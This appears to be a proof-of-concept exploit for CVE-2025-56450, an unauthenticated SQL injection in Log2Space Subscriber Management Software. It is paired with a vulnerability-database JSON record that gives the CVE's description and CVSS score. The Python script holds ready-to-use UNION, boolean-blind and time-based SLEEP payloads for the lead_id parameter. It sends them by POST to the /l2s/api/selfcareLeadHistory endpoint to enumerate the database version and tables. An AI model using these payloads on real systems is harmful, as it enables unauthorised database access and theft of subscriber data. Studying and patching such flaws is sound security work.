CVE-2025-56450

# CVE-2025-56450 PoC - Log2Space SQL Injection via lead_id parameter # Unauthenticated SQL Injection in /l2s/api/selfcareLeadHistory endpoint import requests TARGET_URL = "http://target-host/l2s/api/selfcareLeadHistory" # Payload 1: UNION-based injection to enumerate database version payload_version = "' UNION SELECT @@version,2,3-- -" # Payload 2: UNION-based injection to enumerate table names payload_tables = ( "' UNION SELECT GROUP_CONCAT(table_name),2,3 " "FROM information_schema.tables " "WHERE table_schema=database()-- -" ) # Payload 3: Boolean-based blind injection test payload_boolean = "1' AND 1=1-- -" payload_boolean_false = "1' AND 1=2-- -" # Payload 4: Time-based blind injection payload_time = "1' AND SLEEP(5)-- -" def exploit(target_url, payload): """Send malicious POST request with injected lead_id parameter.""" headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } data = {"lead_id": payload} try: response = requests.post(target_url, headers=headers, data=data, timeout=30) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") print(f"[+] Response Body:\n{response.text[:2000]}") return response except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print("[*] Testing CVE-2025-56450 - Log2Space SQL Injection") print(f"[*] Target: {TARGET_URL}") print("\n[+] Attempting UNION-based injection to get DB version...") exploit(TARGET_URL, payload_version) print("\n[+] Attempting to enumerate tables...") exploit(TARGET_URL, payload_tables) print("\n[+] Attempting boolean-based blind injection...") exploit(TARGET_URL, payload_boolean) exploit(TARGET_URL, payload_boolean_false) print("\n[+] Attempting time-based blind injection...") exploit(TARGET_URL, payload_time)

{"cve": {"id": "CVE-2025-56450", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:38.830", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Log2Space Subscriber Management Software 1.1 is vulnerable to unauthenticated SQL injection via the `lead_id` parameter in the `/l2s/api/selfcareLeadHistory` endpoint. A remote attacker can exploit this by sending a specially crafted POST request, resulting in the execution of arbitrary SQL queries. The backend fails to sanitize the user input, allowing enumeration of database schemas, table names, and potentially leading to full database compromise."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/apboss123/CVE-2025-56450/blob/main/README.md", "source": "[email protected]"}, {"url": "https://reference1.example.com/selfcare/login", "source": "[email protected]"}]}}